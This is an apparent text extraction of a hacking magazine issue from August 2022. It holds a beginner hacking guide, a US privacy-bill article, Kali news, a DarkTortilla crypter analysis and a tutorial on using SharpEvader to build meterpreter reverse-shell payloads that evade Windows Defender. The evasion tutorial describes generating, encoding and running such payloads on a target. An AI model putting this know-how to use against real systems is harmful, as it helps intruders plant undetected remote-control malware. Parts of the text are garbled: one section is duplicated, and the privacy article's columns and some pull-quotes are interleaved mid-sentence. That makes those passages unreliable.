Scribd
Upload
592 views56 pages

Hackercool - Edition 5, Issue 8, August 2022

Uploaded by

P1972
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
592 views56 pages

Hackercool - Edition 5, Issue 8, August 2022

Uploaded by

P1972
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 56

To

Advertise
with us
Contact :
[email protected]
3

Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd


All rights reserved. No part of this publication may be reproduced, distributed, or
transmitted in any form or by any means, including photocopying, recording, or other
electronic or mechanical methods, without the prior written permission of the
publishe -r, except in the case of brief quotations embodied in critical reviews and
certain other noncommercial uses permitted by copyright law. For permission
requests, write to the publisher, addressed “Attention: Permissions Coordinator,” at
the address below.
Any references to historical events, real people, or real places are used fictitiously. Na
-mes, characters, and places are products of the author’s imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd.


Banjara Hills, Hyderabad 500034
Telangana, India.
Website :
www.hackercoolmagazine.com
Email Address :
[email protected]
4

Information provided in this Magazine is


strictly for educational purpose only.
Please don't misuse this knowledge
to hack into devices or networks without
taking permission. The Magazine will not
take any responsibility for misuse of this
information.
5

Then you will know the truth and the truth will set you free.

John 8:32

Edito r' s No te

Edition 5 Issue 8

Two of our Real World


hacking tutorials did not
work as expected.
That is the reason for
delay this time.
But since delay is delay,
WE ARE SORRY.
"THE TECHNIQUE IS DESIGNED TO BE TRIGGERED WHEN THE USER STARTS THE
PRESENTATION MODE AND MOVES THE MOUSE, THE CODE EXECUTION RUNS A
POWERSHELL SCRIPT THAT DOWNLOADS AND EXECUTES A DROPPER FROM
ONEDRIVE."
- CYBERSECURITY FIRM CLUSTER25 ABOUT POWERPOINT MOUSEOVER ATTACK
6

INSID E

See what our Hackercool Magazine August 2022 Issue has in store for you.

1. Real World Hacking :  


How To Become A Hacker By 2023?

2. Online Security :
A New Data Privacy Bill Aims To Give You More Control Over Information
        Collected About You - and Make Businesses Change How They Handle Data.

3. Bypassing AntiVirus :            
SharpEvader.

4. What's New
Kali Linux 2022.3
:       
5. Real World Hacking Scenario :
      What Is DarkTortilla And How It Evaded Detection since 2015?

6. Metasploit This Month :


      FreeSwitch Login, JBoss EAP / AS Remoting, Sourcegraph & Apache Spark

7. Email Security :
      Email Scams Are Getting More Personal - They Even Fool Cybersecurity Experts.
7
How To Become A Hacker by 2023?
REAL WORLD HACKING
People ask me so many questions about hacking. The questions are all about hacking
but they vary so much that I feel like they are trying to connect earth to various points
in Solar System back and forth. Some of the questions include, how is Information
Security same as ethical hacking? What is the difference between Red Hat hacking and
Blackhat hacking? Which programming language should I learn to become a hacker?
What course should I take to become a hacker etc.
In this Issue, I decided to converge various points these people are trying to connect
and answer a question that appears at that convergence. That question is HOW TO
BECOME A HACKER? Yes. How to become a hacker? This question is special to me
for another reason too. The answer to the same question was the Feature Article of the
first Issue of our Hackercool Magazine six years back.
So, I feel like I am time travelling to the time of birth of this Magazine. OK, enough
science fiction or deja vu or whatever it is. Let’s come to the point (or question). How
to become a hacker?
To answer this question, I first need to define who a hacker is or who is a hacker according to
Hackercool Magazine. According to my definition, anybody who can hack is a hacker. That bring
-s us to another question just like clicking on an ISO file revealed a shortcut file in our Previous
Issue.
So, let’s first answer the question. What is it to hack? This is one question I don’t have words to
answer to. But I have one example. Although I think it’s a bit on the bad side. I don’t remember
if I used this example in my debut Issue.
A few years back, I read an article in a newspaper. The article was about mobile phones
found in a prison. In prisons in India, it is prohibited for prisoners to use mobile phones (I assume
it is same all over the world). To make sure this rule is backed up by technology, a particular pris-
on in India had Jammers installed to prevent mobile communication.
However, some prisoners somehow were still able to communicate with the outer world using
mobile phones. How did they do this while Jammers were installed on the prison premises? A
prisoner who happened to be an engineer suggested his fellow prisoners to place some salt on the
Jammer. Earlier, the prisoners poured boiling water and even urinated on the Jammer to disable
it. On the engineer’s suggestion, the prisoners formed a human pyramid with the engineer on top
and he placed the salt on the jammer. Within a few days the jammer became defunct.
How did they get salt? They used salt provided in their daily meals. How did they get mobile
phones? Smuggled or thrown by their relatives from outside into prison compound. How did salt
make the Jammer defunct? This is one question I don’t have answer to. I have googled but this
trick is nowhere and I don’t want to go that deep into the trick. But it’s still a cheap & awesome
trick.
What I want my readers to notice is that prisoners somehow made the jammers do something
which it was not intended to. That’s what hacking is according to me. It’s not about a device or
tool. It’s about your creative thinking that makes the hack work for you.
Nowadays, since hacking is mostly about computers laptops, Firewalls, Mobiles etc. I want to
8
give you some baby steps, then small steps followed by big steps to help you become a hacker.
While giving you these steps, I am assuming you are a complete beginner. So first, let’s start with
the baby steps.
Baby Steps in Hacking
1. Get the basics of hacking right first. This is theoretical stuff. I want you to start with learning
what a network is, how is a network formed and various devices that form a network and what are
the functions of each device in a network i.e learn what is a Router and what it does, what is a swi
-tch and what it does, what is a Desktop and Server etc.
2. While you are getting a grasp on the basics of a network, try to learn a bit of HTML & Javasc
-ript (Don’t yet get into PHP. No, not yet). Why? HTML is the basic building block of websites all
around the world. I think w3schools is the best place to start it.
3. Once you have some knowledge about the devices that form a network, start learning about
some protocols used for communication between various devices in a network. Learn about OSI
protocol, TCP/IP protocol, etc. Learning about these protocols may be a bit boring and sometime-
s complex (at least it seemed to me) but these protocols help you to learn how exactly a network
works. Well, you don’t have to be so perfect that there is an exam in the topic the next day but
just get a general idea as how a network works.
4. Also research about other protocols also like ARP, RARP, IP, SMB, FTP, SMTP, TCP,
TELNET, POP, SFTP, NTP, PPP, IMAP and any other protocols that come up when you are lear
-ning about these.
Learn what are ports? Learn how many ports are these? Which protocols/services use which
port etc.
5. How is that HTML training going on? By now, you should have got a general idea as to the
structure of the website.
Another question people often ask about hacking is how fast they can learn
hacking or how fast they can become perfect in hacking. Well, I don’t want to get into
all that stuff of how some people learn fast by reading and how some people learn fast
by watching videos etc. What I want to tell you is this. No matter which method is your
strongest way of learning things faster, your own research and practical training are
the only things that can make you perfect in the art of hacking.
So, my advice to aspiring hackers is this. Take your own time. Don’t be in a rush and
don’t try to cram everything at once. You know those crash courses that teach you
hacking is 1 0/1 5/30 days? There’s a reason why students who take those courses are
still confused.
While I was a cyber security trainer in institutes that were teaching ethical hacking, the
course time was like around 30 days. After 30 days they can take their exam and get
their certificate. Most of the students who take that course also wanted to become perfect
in the art of hacking.
So they work hard which brings pressure subsequently resulting in confusion and
then some extreme cases losing interest totally. I am not against hard work at all but
there are somethings which need to be achieved using SMART WORK. So, my advice
to aspiring hackers is this, don’t try to become perfect in short time.
9
When people want to learn everything about hacking in a month it reminds me
of that woman Oxley (did I get the name right?) from the movie Indiana Jones:
Kingdom of Crystal Skull who wanted to receive knowledge about everything from the
crystal skulled aliens. Well, though her wish was granted, we all know what happened
to her.
I know what you want ask me. You want to ask me why I titled my article “How to
become a hacker by 2023?”. That’s because I assume that no matter which method you
follow to learn hacking, you will be at least be able to get basic idea about the things I
want you to learn. That timeframe can be 3 months on average.

Small Steps in Hacking


OK. In your own comfortable timeframe, you know a bit of about how networks work, different
devices in a network and their functions, how a website is designed, how and why JavaScript is us-
ed, what is OSI protocol, what is TCP/IP protocol, what are ports and different services that use
them etc. As I already said, you don’t have to be perfect in this. Now let’s take some small steps.
1. Go through some basic hacking terminology like what is a threat, what is a vulnerability and
what is an exploit. What is CIA triangle of cybersecurity? Don’t yet come to the types of hacker
stuff yet. I will explain them all to you by the end of this article.
2. Learn the difference between a Server and a Client. Learn about Client-Server network and
Peer-to-peer network. Learn about different types of Servers.
3. Now, since you now know what a server is and what a Desktop is, it’s time to install your first
server. Why not start with a webserver? Learn what are WAMP, XAMPP and LAMP servers and
learn how to install them on your operating system. Google if you get any doubts while doing this.
4. If you want to learn hacking, you need to have hands on experience with many operating
systems. You can’t get hands on experience unless you install them on your Host system. The best
way to do this is by using Virtualization software like Oracle VirtualBox and VMware. Oracle
VirtualBox is free whereas VMWare is a commercial product. Get your favourite virtualization
software and install it on your host system.
5. Since you have finished installing your favourite Virtualization software, it’s time to install ope
-rating systems on it. Start by installing Windows XP, Windows 7 and Windows Server 2003 to act
as target operating systems. Why only these? Because Microsoft has ended support to these OS
and hence they are easily available. Download Metasploitable2 and install it also on virtualization
software too. Metasploitable2 is the intentionally vulnerable operating system designed for ethical
hackers to practice hacking. You can install other operating systems too based on your requireme-
nt. Remember that the only limitation here is the availability of RAM on your Host operating
system.
Coming to operating systems, we need attacker system too. There are many OS precisely built
for penetration testing and hacking. The list includes Kali Linux, Parrot Security OS, Samurai
WTF, Black Ubuntu, etc. You need to install one (or many) of these to act as your Attacker Oper-
ating System.
Some aspiring hackers have confusion as to which among the above is the best. Choose
whichever one you like (don’t have a never-ending debate within yourself like that Alien X on
Ben 10. Don’t look for the best one. If you can’t decide, just do inky, pinky, ponky and select one.
While I was learning hacking, I was researching about all the tools used in hacking, I had a need
10
Small Steps in Hacking
OK. In your own comfortable timeframe, you know a bit of about how networks work, different
devices in a network and their functions, how a website is designed, how and why JavaScript is us-
ed, what is OSI protocol, what is TCP/IP protocol, what are ports and different services that use
them etc. As I already said, you don’t have to be perfect in this. Now let’s take some small steps.
1. Go through some basic hacking terminology like what is a threat, what is a vulnerability and
what is an exploit. What is CIA triangle of cybersecurity? Don’t yet come to the types of hacker
stuff yet. I will explain them all to you by the end of this article.
2. Learn the difference between a Server and a Client. Learn about Client-Server network and
Peer-to-peer network. Learn about different types of Servers.
3. Now, since you now know what a server is and what a Desktop is, it’s time to install your first
server. Why not start with a webserver? Learn what are WAMP, XAMPP and LAMP servers and
learn how to install them on your operating system. Google if you get any doubts while doing this.
4. If you want to learn hacking, you need to have hands on experience with many operating
systems. You can’t get hands on experience unless you install them on your Host system. The best
way to do this is by using Virtualization software like Oracle VirtualBox and VMware. Oracle
VirtualBox is free whereas VMWare is a commercial product. Get your favourite virtualization
software and install it on your host system.
5. Since you have finished installing your favourite Virtualization software, it’s time to install ope
-rating systems on it. Start by installing Windows XP, Windows 7 and Windows Server 2003 to act
as target operating systems. Why only these? Because Microsoft has ended support to these OS
and hence they are easily available. Download Metasploitable2 and install it also on virtualization
software too. Metasploitable2 is the intentionally vulnerable operating system designed for ethical
hackers to practice hacking. You can install other operating systems too based on your requireme-
nt. Remember that the only limitation here is the availability of RAM on your Host operating
system.
Coming to operating systems, we need attacker system too. There are many OS precisely built
for penetration testing and hacking. The list includes Kali Linux, Parrot Security OS, Samurai
WTF, Black Ubuntu, etc. You need to install one (or many) of these to act as your Attacker Oper-
ating System.
Some aspiring hackers have confusion as to which among the above is the best. Choose
whichever one you like (don’t have a never-ending debate within yourself like that Alien X on
Ben 10. Don’t look for the best one. If you can’t decide, just do inky, pinky, ponky and select one.
While I was learning hacking, I was researching about all the tools used in hacking, I had a need
to download many tools and install them. It was becoming very troublesome this way. It was then
that a thought flashed in my mind. The thought was this “Is there any chance that someone install
-ed all the hacking tools at one place.” That’s how I found my first attacker OS. Martriux Krypton.
Then on further research, I found there are a whole lot of other pen testing distros. I tested all
and found Backtrack (the ancestor of Kali Linux) suitable to me. So, I shifted to it.
6. By now you have installed attacker and target systems on your favourite virtualization softwar-
e. Play with both these systems and get used to them.
7. Read about various web vulnerabilities starting with SQL Injection, LFI, RFI, CSRF, XSS etc.
Try to understand these vulnerabilities. Let me tell you once again. Take your own time. Grasp
things slowly but steadily.
"To some people I'll always be the bad guy. "
- Kevin Minick.
11
Big Steps in Hacking

If you are here, let me tell you that by now you are a Green Hat Hacker. You may not feel like th
-at, but you are one. Now, it’s time to take some big steps.
1. Research what is Content Management System (CMS) and what it does. Learn about differen-
t CMS and their share of usage on the internet. Once you have finished doing it (it shouldn’t take
you more than half an hour), download Wordpress, Joomla and install them on that WAMP serve
-r or XAMPP server or LAMP server, whichever you installed. If you don’t want to install Joomla,
install Wordpress. Why Wordpress? Because Wordpress is the most widely used CMS on internet.
2. On the virtualization software you have installed, start your attacker system and Windows XP,
Find out the IP address of both the attacker system and the target system (ip -a in Linux and
ipconfig in Windows).
3. Almost all of the pen testing distros are made of Linux. To make it dance to your tunes, you
need to speak its language or at least sing in its language. Enter Linux shell scripting. You can’t
even step into the world of hacking if you are not well versed with Linux shell scripting. It’s like to
learn swimming without getting into water. The best way to start learning shell scripting is to start
it at linuxcommand.org.
4. While learning shell scripting, I advise you to also learn Batch programming). Batch is to
Windows what shell is to Linux. But remember shell is more powerful. Learn both of these practic
-ally. These two are called scripting languages and you will realise why they are so important in
future of your hacking journey. While hacking (I mean pen testing), you will most probably get a
reverse shell. These two languages will help you play on the target system whether it is Windows
or Linux.
5. Google about Metasploit. Learn how Metasploit works and research about its usage. Our
Magazine’s previous Issues would be very helpful in this case.
6. Research about the ms08_067 vulnerability. After thorough research, switch on your favourite
Attacker System, start Metasploit, search for ms08_067 exploit and load the module. Also start
Windows XP you installed earlier and exploit the vulnerability with Metasploit. This is probably
your first reverse shell.
7. By now, you have a fair idea about different web vulnerabilities. Research about different inte
-ntionally vulnerable web software. These are web apps that are made intentionally vulnerable so
that beginners in ethical hacking can practice website hacking. Install DVWA first in your WAMP
/XAMPP/LAMP server and practice exploiting different web vulnerabilities. See how they work
and what do you get when they work. Don’t worry even if you don’t get a perfect picture of these
vulnerabilities.
8. Read about various famous (or infamous) vulnerabilities. See if anything comes related to so
mething you have learnt. Keep on researching, keep on reading articles about hacking and keep
on practising hacking. Keep repeating all the baby, small and big steps again and again until you
are confident about yourself.
OK. Now the final step. This is an answer to another question aspiring hackers often ask me.
That question is, Should we learn a programming language to learn hacking? If yes, which progra-
mming language is best for hackers?
Look. It’s partly true that Elite Hackers write their own exploits to any vulnerabilities because they
know how to code. Yes, it is 118% true. But there’s a catch here. Many of the APTS and criminal
hacker groups are now buying exploits for zero-day vulnerabilities and even R.A.A.S (Ransomwa-
re As A Service). This turns the whole concept of ELITE HACKER upside down.
Yes, if you are hacking using tools developed by others in hacking field, you are a Script kiddie.
12
Agreed. But if you are a beginner, it is definitely good to start as a Script kiddie (but remember,
you are a Green Hat Hacker). Try out everything. As you naturally progress in your hacking jour-
ney, you will feel a need to write your own exploits at some time. When you want to do that, you
get to the second question. Which programming language to start with? I know everyone has
his/her own favourite programming language among C, C++, Python, Ruby (the language Metaspl
-oit is written in), Perl etc. So which one to start with.
Start with the one you feel easy about or have little bit knowledge about. If you have no
knowledge about any programming language, my personal suggestion is to start with Python. In
my own experience, Python is a very simple language. When I code with Python, I feel like I am
wiling commands in simple English like Hey, You there, Come here. etc. Of course this is my per-
sonal opinion. But just because Python is easy it doesn’t mean it is powerless.
Python is one of the most powerful programming languages. The number of exploits for many
vulnerabilities written in Python are proof for this. Once you are almost perfect in any one progra
-mming language, you can learn how to write code for exploits for vulnerabilities on your own.
Welcome ELITE HACKER.
OK. Now, you are a hacker (even though you are not yet ELITE HACKER). It’s time to decide
what type of a hacker you want to be. Let’s start with different types of hackers. There are various
types of hackers classified based on what they do and their level of skill.
Black Hat Hackers: Black Hat Hackers are also known as crackers or the bad hackers. They
are the hackers with malicious intentions. If they find any zero-day vulnerability in a software, they
may sell it for profit or exploit it themselves for some profit. Malware Writers, Hackers For Hire,
Ransomware Groups and Criminal Hackers also come under this group.
White Hat Hackers: While Black Hat Hackers are the big bad of the hacker domain, White
Hat Hackers are the good guys. They are also known as Ethical Hackers. They hack for only a sin
-gle purpose, that is to improve the security of any company’s network. Pen testers, Security Resea
-rchers and other cybersecurity professionals can be termed as White Hat Hackers.
Grey Hat Hackers: This type of hackers can be termed as both bad and good. A Grey Hat
Hacker can be a cyber security expert who finds a zero-day vulnerability in a software but he does
-n’t exploit it for malicious purposes like Black Hat Hackers.
Green Hat Hackers: While giving our readers some steps to become a hacker above, I used
a term called Green Hat Hackers. Well, it’s time to define it. A Green Hat Hacker is a person wh-
o is a beginner and still learning hacking skills. Although beginner he is determined to become a
Elite Hacker at some point of time.
Bug Bounty Hackers: Companies nowadays are paying hackers to hack their product or ser-
vice and report any detected vulnerabilities to them. These vulnerabilities are known as bugs and
people who find these bugs and report them to vendor will get a cash reward or swag depending
on the company that is offering a bug bounty.
Blue Hat Hackers: Blue Hat Hackers are those hackers who are hired by the organizations to
test for any vulnerabilities or bugs in the network or software. The only thing they do differently is
that they do this testing before the product is launched or the network has gone LIVE.
Red Hat Hackers: Red Hat Hackers are the radical and extreme versions of White Hat Hack
-ers. They also try to find vulnerabilities in systems and networks but they do this with a specific p-
urpose of hunting for Black Hat Hackers. They are hired by Governments and hence they are rut-
hless in their hunt for Black Hat hackers. In one sentence, their end justifies their means.
Script Kiddie: The beginner stage of almost every hacker. Script kiddies lack any skills like wr
-iting exploits etc. The only thing they are good at is using tools made by other hackers. So, if you
are downloading that Facebook hacking software to hack Facebook, you know what you are?
13
Elite Hacker: Elite Hacker is the complete opposite of Script Kiddie. He is an expert in cyber
security who not only writes his own exploits for the vulnerabilities but also finds those vulnerabili
-ties himself/herself. Everyone is the hacking world aspires to become an Elite Hacker one day or
other. Ex: Phineas Fisher.
Hacktivist: A hacker who doesn’t have any personal profit in hacking. He hacks for non-profit
causes or public causes. These can be either environment, public interest or human rights etc.
Likes of Edward Snowden and Julian Assange.
Suicide Hacker: A hacker who is so interested in hacking that he doesn’t really care about th-
e consequences.
Spy hacker: A hacker who spies on the targets. These are normally used in corporate espionag
-e or maybe even nations.
State Sponsored Hackers/Nation sponsored Hackers: These hackers are appointed
by the Governments of the Nations to hack into another nation’s computer systems or networks.
They are more popularly known as Advanced Persistent Threats (APTs).
Now, you know how to become a hacker and also what type of hacker you want to be. So wh
-at are you waiting for? Start taking those baby, small and big steps and then choose your own
hat.
A new US data privacy bill aims to give you more control over information
collected about you – and make businesses change how they handle data.

ONLINE SECURITY
is likely if a version of the bill passes.
As a legal scholar and attorney who studies
Anne Toomey McKenna and practices technology and data privacy law,
Visiting Professor of Law, I’ve been closely following the act, known as
University of Richmond. ADPPA. If passed, it will fundamentally alter
U.S. data privacy law.
Data privacy in the U.S. is, in many ways, a ADPPA fills the data privacy void, builds in
legal void. While there are limited protections fo federal preemption over some state data privacy
-r health and financial data, the cradle of the wor laws, allows individuals to file suit over violation
ld’s largest tech companies, like Apple, Amazon, -s and substantially changes data privacy law enf-
Google, and Meta (Facebook), lacks any compr- orcement. Like all big changes, ADPPA is gettin-
ehensive federal data privacy law. This leaves g mixed reviews from media, scholars and busin
U.S. citizens with minimal data privacy protectio -esses. But many see the bill as a triumph for
-ns compared with citizens of other nations. But U.S. data privacy that provides a needed nationa
that may be about to change. -l standard for data practices.
With rare bipartisan support, the American
Data and Privacy Protection Act moved out of
the U.S. House of Representatives Committee o-
n Energy and Commerce by a vote of 53-2 on
July 20, 2022. The bill still needs to pass the full ADPPA would apply to “covered” entities, mea-
House and the Senate, and negotiations are ong- ning any entity collecting, processing or transferr
oing. Given the Biden administration’s responsib -ing covered data, including nonprofits and sole
=le data practices strategy, White House support proprietors. It also regulates cellphone and inter-
(Cont'd On Next Page)
14

net providers and other common carriers, with the service-conditioned-on-consent problem – th-
potentially concerning changes to federal comm- ose annoying “I Agree” boxes that force people
-unications regulation. It does not apply to gover to accept a jumble of legal terms. When you clic
-nment entities. -k one of those boxes, you contractually waive
ADPPA defines “covered” data as any your privacy rights as a condition to simply use
information or device that identifies or can be re a service, visit a website or buy a product. The
-asonably linked to a person. It also protects bio- bill will prevent covered entities from using cont-
metric data, genetic data and geolocation inform ract law to get around the bill’s protections.
-ation.
The bill excludes three big data categories:
deidentified data, employee data and publicly
available information. That last category include-
s social media accounts with privacy settings ope The U.S.’s Electronic Communications
-n to public viewing. While research has repeate- Privacy Act can provide federal law makers guid
dly shown deidentified data can be easily reiden -ance in finalizing ADPPA. Like the ADPPA, the
-tified, the ADPPA attempts to address that by r- 1986 ECPA legislation involved a massive overh-
equiring covered entities to take “reasonable tec- aul of U.S. electronic privacy law to address
hnical, administrative, and "ECPA, for comparison, has a adverse effects to individua
physical measures to ensureprivate right of action. It has not-l privacy and civil libertie
that the information cann- -s posed by advancing
ot, at any point, be used overwhelmed courts or businesses, surveillance and commu
to re-identify any individu-
and entities likely comply with ECPA -nication technologies.
al or device.”- Once again, advances
to avoid civil litigation. " in surveillance and data techn-
ologies, such as artificial intelligence, are signific-
antly affecting citizens’ rights.
The act would require data collection to be as ECPA, still in effect today, provides a baseline
minimal as possible. The bill allows covered enti national standard for electronic surveillance prot
-ties to collect, use or share an individual’s data -ections. ECPA protects communications from
only when reasonably necessary and proportion- interception unless one party to the communicati
ate to a product or service the person requests o- -on consents. But ECPA does not preempt states
r to respond to a communication the person initi from passing more protective laws, so states can
-ates. It allows collection for authentication, secu- choose to provide greater privacy rights. The en-
rity incidents, prevention of illegal activities or d result: Roughly a quarter of U.S. states require
serious harm to persons, and compliance with consent of all parties to intercept a communicati-
legal obligations. on, thus providing their citizens increased privac
People would gain rights to access and have -y rights.
some control over their data. ADPPA gives user- ECPA’s federal/state balance has worked for
s the right to correct inaccuracies and potentially decades now, and ECPA has not overwhelmed
delete their data held by covered entities. the courts or destroyed commerce.
The bill permits data collection as part of
research for public good. It allows data collectio-
n for peer-reviewed research or research done in
the public interest – for example, testing whethe- As drafted, ADPPA preempts some state data pr
r a website is unlawfully discriminating. This is -ivacy legislation. This affects California’s Consu-
important for researchers who might otherwise mer Privacy Act, although it does not preempt
run afoul of site terms or hacking laws. the Illinois Biometric Information Privacy Act or
The ADPPA also has a provision that tackles ( Cont'd On Page 33)
15

Sharp Evader

BYPASSING ANTIVIRUS
In this month’s AV Evasion, readers will learn about a Python script called Sharp Evader.
Sharp Evader helps you to automatically generate meterpreter tcp/https shell code and then caesar
encodes it and then develops a C# project. Then some more measures are applied to bypass Beh-
avioural detection. The Features of this Python script are,
1. Automatic generation of windows/x64/meterpreter/reverse_https or
windows/x64/meterpreter/reverse_tcp shellcode by borrowing msfvenom.
2. Applying magic sauce that helps in bypassing Signature Based detection.
(The magic sauce is absolutely not Caesar Cipher).
3. Generating a C# Project with the encoded shellcode and some more spells to bypas-
s Behavioural Based Detection.
4. Powershell Script to generate a reflection ps1 script with the C# executable embedd
-ed inside it.
To use this tool, it can be cloned from Github as shown below.

This creates a directory named sharpEvader. Inside this durectory, there is a python script with
name sharpevader.py. This is our script.
16
Before running the python script, let’s install Powershell and mono in Kali Linux. Why do we nee-
d Powershell? This will help us generate a powershell script reverse shell rev.ps1.This powershell
script consists of C# exe embedded into PS1 script which would then be loaded reflectively into
memory. Mono-mcs is the C# compiler package.

Once mono-mcs and powershell are installed successfully on Kali, let’s run Sharp Evader python
script as shown below.

Specify the LHOST and LPORT options and specify the type of payload you want as shown belo-
w.
17
This will now generate our meterpreter payload.

The generated payload is in the "output" directory with the name of <LHOST IP><LPORT> we
set.

As readers can see, both executable and powershell payloads are present.
18
Good, now let’s test it on the target system. Before moving the payload to the target system, let’s
start a Metasploit listener on the attacker system.

The listener’s ready. Now let’s move the payload to the target system.

Let’s just make sure the Windows Defender is up to date.


19

Let’s download the payload to the target system and execute it.

London Police have arrested a 1 7 year old teenager from Oxfordshire on suspicion of
some high profile hacks.
20

As readers can see, we successfully have a meterpreter session.

Now, let’s try the same with the powershell payload.


So p ho s released a p atch fo r a new zero - day vulnerability in its firewall p ro duct. This
new zero - day vulnerability was being actively exp lo ited by attackers in the wild.
21

We once again have a meterpreter session.

In both cases, Windows Defender failed to detect the malicious payload. In the output directory
of SharpEvader, readers can see a directory named csharp. Inside this csharp directory, you will
22
see a C# project file of the reverse shell payloads we just generated.

In case, you have no powershell and mono installed on the attacker system, you can simply move
this C# project to a Windows system with Visual Studio installed and build it from there. This
procedure has been shown multiple times in previous Issues of our Magazine.
Kali Linux 2022.3
WHAT'S NEW
It’s a bit odd. While we were writing “What’s New” of our previous Issue, the makers of Kali
released the latest version of the operating system, Kali Linux 2022.3. In this Issue, let’s see What
’s New in Kali Linux 2022.3.
TEST LAB ENVIRONMENT
In our feature article of this Issue "How to become a hacker", I told you the importance of
practice to become a hacker and also gave you a few resources for practising hacking. Well, it’s
just a coincidence that the makers of Kali Linux have decided to make it easier for aspiring hacke-
rs to practise hacking. They did this by packaging some intentionally Vulnerable apps as kali pack
-ages that can be installed as any other package. As a beginning they are first bringing DVWA an-
d Juiceshop. I am sure they will soon bring more apps in future releases. Let us see how to install
DVWA in this Issue. After booting the latest release of Kali, open a terminal and enter command
sudo apt update.
23
Next, install DVWA as shown below.
24

CISA has warned that hackers are actively exploiting the recently disclosed
vulnerability in ZOHO Manage Engine.
25

The installatio n sho uld finish as sho wn b e lo w.

Start dvwa se rvice as sho wn b e lo w.


26
The dvwa service is successfully started.

The DVWA service is installed with its own Nginx server and has nothing to do with the Apache
server of Kali Linux. The configuration files of DVWA are in the /etc folder.
27
For example, if you want to change the port on which DVWA is running, you can do it in dvwa-
nginx.conf file.

VIRTUAL MACHINE UPDATES


With this release, the VirtualBox image of Kali will be released as a VDI disk and a vbox
metadata file instead of a OVA file. VDI disk is the native format of VirtualBox and has a better
compression ratio than OVA file.
28
NEW TOOLS
Just like any other release of Kali, new tools have been added this time too. The new tools that
are added to this release are Brute shark, DefectDojo, phpsploit, shellfire and Spraying Toolkit.
KALI NETHUNTER UPDATES
Many apps in the NetHunter store are updated to their latest release. With updates to the
NetHunter app and addition of 6 new kernels to the NetHunter repository support for Android 12
is soon getting closer.
KALI ARM UPDATES
With this release, the default size for the book partition has been set to 256MB for every Kali
ARM device. The kernel of all Raspberry PI devices had been upgraded to 5.15. The broken slee
-p modes problem of PineBook has been fixed too.
KALI TOOLS REPO
The Kali Tools repository has been opened up to accept community contributions. So, if you
have a tool (Your own tool) which you want to see in Kali Linux, this is the chance. Make sure yo-
u submit general information, examples of its usage and information about how to use the tool bef
-ore submitting it.
DISCORD SERVER
A new Discord server has been opened that’s been named "Kali Linux & Friends." This is for
Kali community to get together and chat real time. So, if you are facing any problem or have a qu
-estion, please search for your topic and ask questions.
ARE YOU THE GUY/GIRL?
If you know Go (Golang Programming language), then you can be the guy/girl the Kali Linux
makers are looking for. They need some help in an already existing project. If you think you fit th
-is description, you should tweet at them directly or email them i can help at Kali dot.org. Other t-
han all these, the latest version of Kali received many minor updates too.

MooBot, a variant of the MIRAI botnet is now co-opting vulnerable D-Link devices
into an army of DOS Bots by taking advantage of multiple exploits.
29
What Is DarkTortilla And How It Evaded Detection Since 2015?
REAL WORLD HACKING SCENARIO
Our readers have learnt about some crypters in our Magazine. A crypter is a software
used to make the malware undetectable by Anti-Malware. Well, Dark Tortilla is one
such crypter. The speciality of DarkTortilla is not that it has been around since 201 5
but also that it has been successful in evading detection since then.

In this article, readers will learn how DarkTortilla has been evading detection. DarkTortilla is
.NET based crypter that has been used to deliver many popular information stealers and RATs
like Agent Tesla Redline, Nanocore Async RAT, Cobalt Strike and even Metasploit.
Researchers at Counter Threat Unit (CTU) of SecureWorks have observed that 93 samples of
DarkTortilla were being uploaded on average every week to VirusTotal since January 2021 to
May 2022. They began analysing those samples and this article is a result of their analysis.
Mode Of Delivery
The mode of delivery to deliver DarkTortilla has been similar to delivery of other loaders we
have seen recently. They are delivered using spear phishing emails or malspam emails. Secure
Works has observed that the malspam emails to deliver DarkTortilla are in various languages like
English, German, Romanian, Spanish, Italian and Bulgarian and had a lure related to logistics.
The payload was delivered as an attachment that was in ISO, zip, img, dmg and .tar format (we
have seen this in our June 2022 Issue). These archive files contained a single executable whose na-
me was same as the name of the archive but with .exe extension. This executable is the initial
loader sample of DarkTortilla.
Malicious documents were also used to deliver DarkTortilla. In these malicious documents,
DarkTortilla is usually embedded as packager shell object. Another method used embedded
macros to deliver this crypter.
Contents Of DarkTortilla Crypter
DarkTortilla contains two components. They are,
1. NET bused initial loaders
2. NET bused core processor in DLL format.
CTU researchers observed that the core processor was embedded within the .NET resources of
the Initial Loader. There were also some samples where the Loader retrieved the encoded core
processor from public paste sites like Pastebin etc

"The only way to maintain privacy on the internet is to not be on the


internet"
- Abhijit Naskar.
30
Initial Loaders
The Initial loader components of the Dark Tortilla Crypter sample were obfuscated
DeepSea.NET code obfuscator to prevent analysis of the code. Hence most of the names were ran
-dom names. The same obfuscator also applies switch dispatch control flow obfuscation which rest
-ructures code into switch statements that further makes analysis harder. In addition to this, the
configuration of DarkTortilla in encrypted and stored as bitmap images.
The first thing the initial loader does on executing it is to check for internet connectivity by
issuing HTTP GET Requests. If the check fails, then the Loader continuously performs the checks
until it gets an internet connectivity. Once it gets internet connectivity, the loader downloads conte
-nt from google.com and bing.com. But the main function of the loader is to retrieve the encoded
core processer data.
The retrieval method depends on where the encoded core processor data is present. If the
processor data is in .NET resources of the initial loaded binary, the loader generates a key to deco
-de the processor. This key is hard coded. After decoding the processor data, the loader loads the
core processor assembly code and executes its entry point.
If the core processor data is loaded on an external site (public paste site), the loader first
decodes the URL where the core processor is hosted. The encoding logic is different for different
samples observed by the researchers. This is probably done to make detection and analysis harde-
r. "The most important feature of
The initial loader retrieves an encoded
string hosted at the URL DarkTortilla is not its main payload after decoding it. Alth-
ough the string represenbut its addon packages. DarkTortilla -ts the encoded core
processor data, it has been filled with take
XML tags, delimiters can be configured with zero or more made of random letters
and integer values encod payloads which doesn’t include its -ed with a shift cipher to
make decoding very hard. The loader downloads this data but
doesn’t save it on the file system but main payload. only " stores it in memory.
The initial loader decodes this string first by removing fake XML tags, then converting the
string into an array of integers by replacing the random letter character delimiters with a consisten
-t letter and then using the same letter to split the string into integers. The final step is to iterate thr-
ough the integer array and subtract a pre-defined value. This value is once again different for diffe
-rent samples.
Core Processor
The core processor contains the primary functionality of DarkTortilla. The core processor is a
DLL file normally named Deserizialized.dll, SHCore.dll, PVCore.dll and SHcore2.dll. From
March 2022, the names of this DLL started using more random names.
